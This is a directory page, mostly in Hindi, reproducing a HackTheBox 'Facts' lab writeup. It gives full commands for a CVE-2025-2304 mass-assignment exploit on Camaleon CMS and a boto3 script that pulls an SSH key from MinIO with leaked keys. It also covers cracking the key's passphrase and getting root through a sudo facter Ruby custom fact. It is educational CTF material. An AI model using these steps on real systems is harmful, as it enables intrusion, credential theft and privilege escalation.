Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
HTB-Facts-Writeup — HackTheBox Facts मशीन राइटअप — CVE-2025-2304, MinIO S3 एन्यूमरेशन, SSH कुंजी क्रैकिंग, और facter विशेषाधिकार वृद्धि। | Kitploit
उपकरण/GitHubGitHub/karimelsheikh1/htb-facts-writeup
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षालर्निंग और शिक्षा
GitHubkarimelsheikh1/htb-facts-writeup

HTB-Facts-Writeup

3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HackTheBox Facts मशीन राइटअप — CVE-2025-2304, MinIO S3 एन्यूमरेशन, SSH कुंजी क्रैकिंग, और facter विशेषाधिकार वृद्धि।

रिपॉजिटरी देखें

HackTheBox — Facts Machine Writeup

HackTheBox Difficulty OS

मशीन जानकारी

फ़ील्डविवरण
नामFacts
OSLinux
कठिनाईEasy
रिलीज़Season 10
रिटायर्डNo

अटैक चेन अवलोकन

root@kitploit:~
Recon → Web Enumeration → CVE-2025-2304 (Mass Assignment) → S3/MinIO Credential Leak → SSH Key Extraction → Passphrase Cracking → User Shell → facter Sudo Abuse → Root

उपयोग किए गए टूल


रिकॉनिसेंस

पोर्ट स्कैन

root@kitploit:~
sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>

परिणाम:

root@kitploit:~
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
root@kitploit:~
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts

वेब एन्यूमरेशन

root@kitploit:~
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml

मुख्य निष्कर्ष:

  • CMS पहचाना गया: Camaleon CMS 2.9.0
  • एडमिन पैनल: http://facts.htb/admin/login
  • रजिस्ट्रेशन पेज: http://facts.htb/admin/register

प्रारंभिक अभिगम

चरण 1 — खाता पंजीकृत करें

http://facts.htb/admin/register पर जाएं और एक खाता बनाएं। ध्यान दें कि एक कैप्चा है — ब्राउज़र के माध्यम से पंजीकरण करें।

चरण 2 — CVE-2025-2304 (Mass Assignment विशेषाधिकार वृद्धि)

updated_ajax एंडपॉइंट permit! का उपयोग करता है जो role सहित सभी पैरामीटर्स को अपडेट करने की अनुमति देता है।

root@kitploit:~
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e

आउटपुट:

root@kitploit:~
[+] Login confirmed
    Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321

क्लाउड एन्यूमरेशन — MinIO S3

पोर्ट 54321 एक MinIO S3-संगत सर्वर चलाता है। लीक हुई क्रेडेंशियल्स का उपयोग करके:

root@kitploit:~
import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))

मिली महत्वपूर्ण फ़ाइलें:

root@kitploit:~
.ssh/authorized_keys
.ssh/id_ed25519        ← SSH निजी कुंजी
.profile
.bashrc

SSH कुंजी क्रैकिंग

root@kitploit:~
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

क्रैक किया गया पासफ़्रेज़: dragonballz


यूज़र शेल

root@kitploit:~
ssh -i /tmp/.ssh_id_ed25519 [email protected]
# पासफ़्रेज़ दर्ज करें: dragonballz
root@kitploit:~
cat /home/william/user.txt

विशेषाधिकार वृद्धि

एन्यूमरेशन

root@kitploit:~
sudo -l
root@kitploit:~
(ALL) NOPASSWD: /usr/bin/facter

शोषण — facter कस्टम फैक्ट (Ruby कोड निष्पादन)

Facter कस्टम फैक्ट्स को Ruby स्क्रिप्ट के रूप में लोड करता है। चूँकि हम इसे बिना पासवर्ड के root के रूप में चला सकते हैं, हम मनमाना Ruby कोड इंजेक्ट करते हैं:

root@kitploit:~
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn

Root शेल प्राप्त हुआ!

root@kitploit:~
whoami   # root
cat /root/root.txt

मुख्य निष्कर्ष

  • Mass assignment कमजोरियाँ विशेषाधिकार वृद्धि की अनुमति देती हैं जब इनपुट ठीक से फ़िल्टर नहीं किया जाता
  • गलत कॉन्फ़िगर किए गए S3/MinIO बकेट SSH निजी कुंजियों सहित संवेदनशील फ़ाइलें उजागर कर सकते हैं
  • SSH कुंजियों पर कमज़ोर पासफ़्रेज़ rockyou जैसी सामान्य वर्डलिस्ट से क्रैक किए जा सकते हैं
  • NOPASSWD sudo बाइनरी का दुरुपयोग की संभावना के लिए हमेशा जाँच की जानी चाहिए
  • छोटी गलत कॉन्फ़िगरेशनों की श्रृंखला पूर्ण सिस्टम समझौते का कारण बन सकती है

संदर्भ

  • CVE-2025-2304 — Camaleon CMS Mass Assignment
  • GTFOBins — facter
  • HackTheBox

यह राइटअप केवल शैक्षिक उद्देश्यों के लिए है। सुरक्षा परीक्षण हमेशा उन्हीं सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।

टूल डाउनलोड करें
टूलउद्देश्य
Nmapपोर्ट स्कैनिंग और सेवा पहचान
Feroxbusterवेब डायरेक्ट्री एन्यूमरेशन
CVE-2025-2304 PoCCamaleon CMS विशेषाधिकार वृद्धि
boto3 (Python)MinIO/S3 एन्यूमरेशन और फ़ाइल डाउनलोड
ssh2johnSSH कुंजी को क्रैक करने योग्य हैश में बदलें
John the RipperSSH कुंजी पासफ़्रेज़ क्रैक करें
factersudo गलत कॉन्फ़िगरेशन के माध्यम से विशेषाधिकार वृद्धि